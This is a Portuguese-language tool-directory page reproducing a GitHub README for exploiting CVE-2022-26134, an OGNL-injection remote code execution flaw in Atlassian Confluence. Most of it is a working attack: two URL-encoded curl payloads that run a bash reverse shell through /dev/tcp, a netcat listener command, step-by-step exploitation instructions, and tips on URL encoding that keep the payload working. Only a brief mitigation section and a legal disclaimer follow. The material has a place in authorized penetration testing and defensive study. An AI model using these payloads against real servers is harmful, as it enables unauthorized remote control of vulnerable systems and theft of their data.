Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26134 — Exploração Ativa do Aplicativo Questions for Confluence da Atlassian CVE-2022-26134 | Kitploit
Ferramentas/GitHubGitHub/khalidhaimur/cve-2022-26134
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubkhalidhaimur/cve-2022-26134

CVE-2022-26134

Exploração Ativa do Aplicativo Questions for Confluence da Atlassian CVE-2022-26134

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploração Ativa da Confluence CVE-2022-26134

Visão Geral

CVE-2022-26134 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta o Atlassian Confluence. Esta vulnerabilidade permite que invasores não autenticados executem código arbitrário injetando expressões OGNL em endpoints vulneráveis.

Versões Afetadas

  • Todas as versões suportadas do Atlassian Confluence Server e Data Center anteriores ao lançamento corrigido.

Detalhes do Exploit

O seguinte comando CURL demonstra a exploração ativa desta vulnerabilidade, utilizando o mecanismo Nashorn do Java para executar um shell reverso:

root@kitploit:~
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

Ao fazer essas modificações, também precisamos levar em conta a codificação de URL. A string do payload na prova de conceito não está completamente codificada em URL. Certos caracteres (notadamente ".", "-" e "/") não são codificados. Embora nem sempre seja o caso, para este exploit, isso se mostra importante para o funcionamento do payload. Se qualquer um desses caracteres for codificado, o servidor interpretará a URL de forma diferente, e o payload pode não ser executado. Isso significa que não podemos aplicar a codificação de URL em todo o payload depois de modificá-lo.

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/

Detalhamento do Payload

  1. ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
    • Usa o mecanismo de script Java Nashorn para avaliar uma expressão OGNL.
  2. new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
    • Cria um shell reverso que se conecta de volta a 10.0.0.28:1270.

Etapas de Exploração

  1. Configure um listener na sua máquina de ataque:
    root@kitploit:~
    nc -lvnp 1270
    
  2. Execute o comando de exploit CURL.
  3. Após a exploração bem-sucedida, você receberá um shell reverso.

Mitigação

  • A Atlassian lançou correções de segurança para as versões afetadas. É altamente recomendável atualizar para a versão mais recente imediatamente.
  • Restrinja o acesso aos servidores Confluence a partir de fontes não confiáveis.
  • Monitore os logs em busca de solicitações suspeitas contendo expressões OGNL.

Referências

  • Aviso de Segurança da Atlassian
  • Detalhes do CVE-2022-26134

Aviso Legal

Esta documentação é apenas para fins educacionais. A exploração não autorizada de sistemas é ilegal e pode resultar em consequências graves. Sempre obtenha autorização adequada antes de realizar avaliações de segurança.

Baixar ferramenta